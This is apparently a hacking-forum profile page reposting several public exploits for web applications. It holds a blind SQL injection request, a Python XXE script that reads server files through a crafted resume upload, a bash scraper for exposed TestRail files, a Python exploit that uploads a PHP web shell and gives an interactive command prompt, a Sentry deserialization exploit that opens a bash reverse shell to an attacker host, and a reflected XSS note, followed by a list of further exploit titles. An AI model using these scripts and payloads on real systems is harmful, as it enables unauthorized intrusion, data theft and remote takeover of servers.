# Exploit Title: Simple Attendance System 1.0 - Unauthenticated Blind SQLi # Exploit Author: ()t/\/\1 # Date: September 21, 2021 # Vendor Homepage: https://www.sourcecodester.com/php/14948/simple-attendance-system-php-and-sqlite-free-source-code.html # Tested on: Linux # Version: v1.0 # Exploit Description: The application suffers from an unauthenticated SQL Injection vulnerability.Input passed through 'employee_code' POST parameter in 'http://127.0.0.1//attendance/Actions.php?a=save_attendance' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and retrieve sensitive data. # PoC request POST /attendance/Actions.php?a=save_attendance HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/attendance/attendance.php Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 138 Connection: close Cookie: PHPSESSID=11c4e96bb334b51540f4758e9d33885d employee_code=2d'+OR+SUBSTR((select+user_id+from+user_list+where+username="admin"),1,1)="1"--&att_type_id=1&date_created=&att_type=Time+In

Thursday at 04:57 PM4 days

# Exploit Title: OpenCats 0.9.4-2 - 'docx ' XML External Entity Injection (XXE) # Date: 2021-09-20 # Exploit Author: Jake Ruston # Vendor Homepage: https://opencats.org # Software Link: https://github.com/opencats/OpenCATS/releases/download/0.9.4-2/opencats-0.9.4-2-full.zip # Version: < 0.9.4-3 # Tested on: Linux # CVE: 2019-13358 from argparse import ArgumentParser from docx import Document from zipfile import ZipFile from base64 import b64decode import requests import re xml = """ <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <!DOCTYPE root [<!ENTITY file SYSTEM 'php://filter/convert.base64-encode/resource={}'>]> <w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14"> <w:body> <w:p> <w:r> <w:t>START&file;END</w:t> </w:r> </w:p> <w:sectPr w:rsidR="00FC693F" w:rsidRPr="0006063C" w:rsidSect="00034616"> <w:pgSz w:w="12240" w:h="15840"/> <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="720" w:footer="720" w:gutter="0"/> <w:cols w:space="720"/> <w:docGrid w:linePitch="360"/> </w:sectPr> </w:body> </w:document> """ class CVE_2019_13358: def __init__(self): self.args = self.parse_arguments() def parse_arguments(self): parser = ArgumentParser() required = parser.add_argument_group("required arguments") required.add_argument("--url", help="the URL where OpenCATS is hosted", required=True) required.add_argument("--file", help="the remote file to read", required=True) args = parser.parse_args() if not args.url.startswith("http"): args.url = f"http://{args.url}" args.url = f"{args.url}/careers/index.php" return args def create_resume(self): document = Document() document.add_paragraph() document.save("resume.docx") def update_resume(self): with ZipFile("resume.docx", "r") as resume: resume.extractall() with open("word/document.xml", "w") as document: document.write(xml.format(self.args.file).strip()) with ZipFile("resume.docx", "w") as resume: resume.write("word/document.xml") def get(self): params = { "m": "careers", "p": "showAll" } try: request = requests.get(self.args.url, params=params) except Exception as e: raise Exception("Failed to GET to the URL provided", e) id = re.search(r"ID=([0-9])*", request.text) if id is None: raise Exception("No vacancies were found") return id.group(1) def post(self, id): params = { "m": "careers", "p": "onApplyToJobOrder" } files = { "ID": (None, id), "candidateID": (None, -1), "applyToJobSubAction": (None, "resumeLoad"), "file": (None, ""), "resumeFile": open("resume.docx", "rb"), "resumeContents": (None, ""), "firstName": (None, ""), "lastName": (None, ""), "email": (None, ""), "emailconfirm": (None, ""), "phoneHome": (None, ""), "phoneCell": (None, ""), "phone": (None, ""), "bestTimeToCall": (None, ""), "address": (None, ""), "city": (None, ""), "state": (None, ""), "zip": (None, ""), "keySkills": (None, "") } try: request = requests.post(self.args.url, params=params, files=files) except Exception as e: raise Exception("Failed to POST to the URL provided", e) start = request.text.find("START") end = request.text.find("END") file = request.text[start + 5:end].strip() try: file = b64decode(file) file = file.decode("ascii").strip() except: raise Exception("File not found") print(file) def run(self): self.create_resume() self.update_resume() id = self.get() self.post(id) CVE_2019_13358().run()

Thursday at 04:57 PM4 days

# Exploit Title: Gurock Testrail 7.2.0.3014 - 'files.md5' Improper Access Control # Date: 22/09/2022 # Exploit Author: Sick Codes & JohnJHacking (Sakura Samuraii) # Vendor Homepage: https://www.gurock.com/testrail/ # Version: 7.2.0.3014 and below # Tested on: macOS, Linux, Windows # CVE : CVE-2021-40875 # Reference: https://johnjhacking.com/blog/cve-2021-40875/ CVE-2021-40875: Improper Access Control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths. The corresponding file paths can be tested, and in some cases, result in the disclosure of hardcoded credentials, API keys, or other sensitive data. # Method 1 #!/bin/bash # Author: sickcodes & johnjhacking # Contact: https://twitter.com/sickcodes # https://github.com/SakuraSamuraii/derailed # Copyright: sickcodes (C) 2021 # License: GPLv3+ # stop null byte error while curling shopt -s nullglob ! [ "${1}" ] && { echo "No target was specified. ./script.sh 'https://target/'" && exit 1 ; } TARGET="${1}" wget https://raw.githubusercontent.com/SakuraSamuraii/derailed/main/files.md5.txt FILE_LIST="${PWD}/files.md5.txt" mkdir -p ./output cd ./output touch ./accessible.log # option to get a fresh updated files.md5, if it comes in a future version # curl "${TARGET}/files.md5" > ./files.md5 while read -r HASH SUFFIX; do echo "${SUFFIX}" TESTING_URL="${TARGET}/${SUFFIX}" echo "========= ${TESTING_URL} =========" # Ignore list, some of these files MAY be world readable, # if the organisation has modified permissions related # to the below files otherwise, they are ignored. case "${SUFFIX}" in *'.php' ) continue ;; *'.html' ) continue ;; *'LICENSE' ) continue ;; *'README.md' ) continue ;; *'.js' ) continue ;; *'.svg' ) continue ;; *'.gif' ) continue ;; *'.png' ) continue ;; *'.css' ) continue ;; *'.exe' ) continue ;; # *'.add_your_own' ) continue # ;; esac # peek at page response # doesn't work because gurock returns 200 and prints the error in plaintext # curl -s -I -X POST "${TESTING_URL}" # feth the page, following redirects, to a variable OUTPUT_DATA="$(curl -L -vvvv "${TESTING_URL}")" # find matching disqualifying pharses in the page contents # and pass any pages that are "denied access" or "direct script access" case "${OUTPUT_DATA}" in *'No direct script'* ) continue ;; *'Directory Listing Denied'* ) continue ;; esac # save all interesting pages, without forward slashes # https://www.target/ # will be saved as: # https:::www.target <http://www.target>: tee "${SUFFIX//\//\:}" <<< "${OUTPUT_DATA}" # print to stdout, and also append to ./accessible.log the successful saves tee -a ./accessible.log <<< "${TESTING_URL}" done < "${FILE_LIST}" ### Results in your results folder you will have a few important files from the host, namely the initial SQL database insert statements with specific unique information pertaining to that server running Gurock Testrail 7.2.0.3014 and below

Thursday at 04:57 PM4 days

# Exploit Title: Online Reviewer System 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Exploit Author: Abdullah Khawaja # Date: 2021-09-21 # Vendor Homepage: https://www.sourcecodester.com/php/12937/online-reviewer-system-using-phppdo.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/reviewer_0.zip # Version: 1.0 # Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4 # Description: Online Reviewer System 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters. # RCE via executing exploit: # Step 1: run the exploit in python with this command: python3 ORS_v1.0.py # Step 2: Input the URL of the vulnerable application: Example: http://localhost/reviewer/ import requests, sys, urllib, re import datetime from colorama import Fore, Back, Style requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL print(Style.BRIGHT+" Online Reviewer System 1.0") print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL) print(header) print(r""" ______ _______ ________ ___ //_/__ /_______ ___ _______ ______(_)_____ _ __ ,< __ __ \ __ `/_ | /| / / __ `/____ /_ __ `/ _ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ / /_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___ / \__,_/ /___/ abdullahkhawaja.com """) GREEN = '\033[32m' # Green Text RED = '\033[31m' # Red Text RESET = '\033[m' # reset to the defaults # proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} #Create a new session s = requests.Session() #Set Cookie cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'} LINK=input("Enter URL of The Vulnarable Application : ") def webshell(LINK, session): try: WEB_SHELL = LINK+'/system/system/admins/assessments/databank/files/'+filename getdir = {'cmd': 'echo %CD%'} r2 = session.get(WEB_SHELL, params=getdir, verify=False) status = r2.status_code if status != 200: print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL) r2.raise_for_status() print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.') cwd = re.findall('[CDEF].*', r2.text) cwd = cwd[0]+"> " term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET while True: thought = input(term) command = {'cmd': thought} r2 = requests.get(WEB_SHELL, params=command, verify=False) status = r2.status_code if status != 200: r2.raise_for_status() response2 = r2.text print(response2) except: print("\r\nExiting.") sys.exit(-1) #Creating a PHP Web Shell phpshell = { 'personImage': ( 'kh4waja.php', '<?php echo shell_exec($_REQUEST["cmd"]); ?>', 'application/octet-stream', {'Content-Disposition': 'form-data'} ) } # Defining value for form data data = {'difficulty_id':'1', 'test_desc':'CIVIL ENGINEERING', 'test_desc':'CIVIL ENGINEERING', 'test_subject':'Mathematics, Surveying and Transportation Engineering', 'description':'Hello World', 'option_a':'a', 'option_b':'b', 'option_c':'c', 'option_d':'d', 'answer':'A', 'btnAddQuestion':'Save' } filename = 'kh4waja.php' #Uploading Reverse Shell print("[*]Uploading PHP Shell For RCE...") upload = s.post(LINK+'system/system/admins/assessments/databank/btn_functions.php?action=add', cookies=cookies, files=phpshell, data=data) shell_upload = True if("" in upload.text) else False u=shell_upload if u: print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) else: print(RED+"[-]Failed To Upload The PHP Shell!", RESET) #Executing The Webshell webshell(LINK, s)

Thursday at 04:57 PM4 days

# Exploit Title: Sentry 8.2.0 - Remote Code Execution (RCE) (Authenticated) # Date: 22/09/2021 # Exploit Author: Mohin Paramasivam (Shad0wQu35t) # Vulnerability Discovered By : Clement Berthaux (SYNACKTIV) # Software Link: https://sentry.io/welcome/ # Advisory: https://doc.lagout.org/Others/synacktiv_advisory_sentry_pickle.pdf # Tested on: Sentry 8.0.0 # Fixed Versions : 8.1.4 , 8.2.2 # NOTE : Only exploitable by a user with Superuser privileges. # Example Usage : https://imgur.com/a/4w5rH5s import requests import re import warnings from bs4 import BeautifulSoup import sys import base64 import urllib import argparse import os import time from cPickle import dumps import subprocess from base64 import b64encode from zlib import compress from shlex import split from datetime import datetime parser = argparse.ArgumentParser(description='Sentry < 8.2.2 Authenticated RCE') parser.add_argument('-U',help='Sentry Admin Username / Email') parser.add_argument('-P',help='Sentry Admin Password') parser.add_argument('-l',help='Rev Shell LHOST') parser.add_argument('-p',help='Rev Shell LPORT ',type=int) parser.add_argument('--url',help='Sentry Login URL ') args = parser.parse_args() username = args.U password = args.P lhost = args.l lport = args.p sentry_url = args.url # Generate Payload class PickleExploit(object): def __init__(self, command_line): self.args = split(command_line) def __reduce__(self): return (subprocess.Popen, (self.args,)) rev_shell = '/bin/bash -c "bash -i >& /dev/tcp/%s/%s 0>&1"' %(lhost,lport) payload = b64encode(compress(dumps(PickleExploit(rev_shell)))) print("\r\n[+] Using Bash Reverse Shell : %s" %(rev_shell)) print("[+] Encoded Payload : %s" %(payload)) # Perform Exploitation warnings.filterwarnings("ignore", category=UserWarning, module='bs4') request = requests.Session() print("[+] Retrieving CSRF token to submit the login form") print("[+] URL : %s" %(sentry_url)) time.sleep(1) page = request.get(sentry_url) html_content = page.text soup = BeautifulSoup(html_content,features="lxml") token = soup.findAll('input')[0].get("value") print("[+] CSRF Token : "+token) time.sleep(1) #Login proxies = { "http" : "http://127.0.0.1:8080", "https" : "https://127.0.0.1:8080", } login_info ={ "csrfmiddlewaretoken": token, "op": "login", "username": username, "password": password } login_request = request.post(sentry_url,login_info) if login_request.status_code==200: print("[+] Login Successful") time.sleep(1) else: print("Login Failed") print(" ") sys.exit() #get admin page split_url = sentry_url.split("/")[2:] main_url = "http://"+split_url[0] audit_url = main_url+"/admin/sentry/auditlogentry/add/" #request auditpage date = datetime.today().strftime('%Y-%m-%d') time = datetime.today().strftime('%H:%M:%S') exploit_fields = { "csrfmiddlewaretoken" : request.cookies['csrf'], "organization" : "1", "actor_label" : "root@localhost", "actor" : "1", "actor_key" : " ", "target_object" : "2", "target_user" : " ", "event" : "31", "ip_address" : "127.0.0.1", "data" : payload, "datetime_0" : date, "datetime_1" : time, "initial-datetime_0" : date, "initial-datetime_1" : time, "_save" : "Save" } print("[+] W00t W00t Sending Shell :) !!!") stager = request.post(audit_url,exploit_fields) if stager.status_code==200: print("[+] Check nc listener!") else: print("Something Went Wrong or Not Vulnerable :(")

Thursday at 04:57 PM4 days

# Exploit Title: Cloudron 6.2 - 'returnTo ' Cross Site Scripting (Reflected) # Date: 10.06.2021 # Exploit Author: Akıner Kısa # Vendor Homepage: https://cloudron.io # Software Link: https://www.cloudron.io/get.html # Version: 6.3 > # CVE : CVE-2021-40868 Proof of Concept: 1. Go to https://localhost/login.html?returnTo= 2. Type your payload after returnTo= 3. Fill in the login information and press the sign in button.

Thursday at 04:57 PM4 days

Sign In

HireHackking

Joined

Last visited

Everything posted by HireHackking

Evolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated)

WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass

AlphaWeb XE - File Upload Remote Code Execution (RCE) (Authenticated)

Simple Attendance System 1.0 - Authenticated bypass

Library Management System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)

WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated)

T-Soft E-Commerce 4 - change 'admin credentials' Cross-Site Request Forgery (CSRF)

Church Management System 1.0 - 'search' SQL Injection (Unauthenticated)

Title: How to hook up with the newly moved girl next door

Online Food Ordering System 2.0 - Remote Code Execution (RCE) (Unauthenticated)

Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

Title: File Integrity Detection Tool--hashdeep

WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)

Budget and Expense Tracker System 1.0 - Authenticated Bypass

Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC)

TotalAV 5.15.69 - Unquoted Service Path

e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)

Filerun 2021.03.26 - Remote Code Execution (RCE) (Authenticated)

Simple Attendance System 1.0 - Unauthenticated Blind SQLi

OpenCats 0.9.4-2 - 'docx ' XML External Entity Injection (XXE)

Gurock Testrail 7.2.0.3014 - 'files.md5' Improper Access Control

Online Reviewer System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

Sentry 8.2.0 - Remote Code Execution (RCE) (Authenticated)

Cloudron 6.2 - 'returnTo ' Cross Site Scripting (Reflected)

Account

Navigation

Search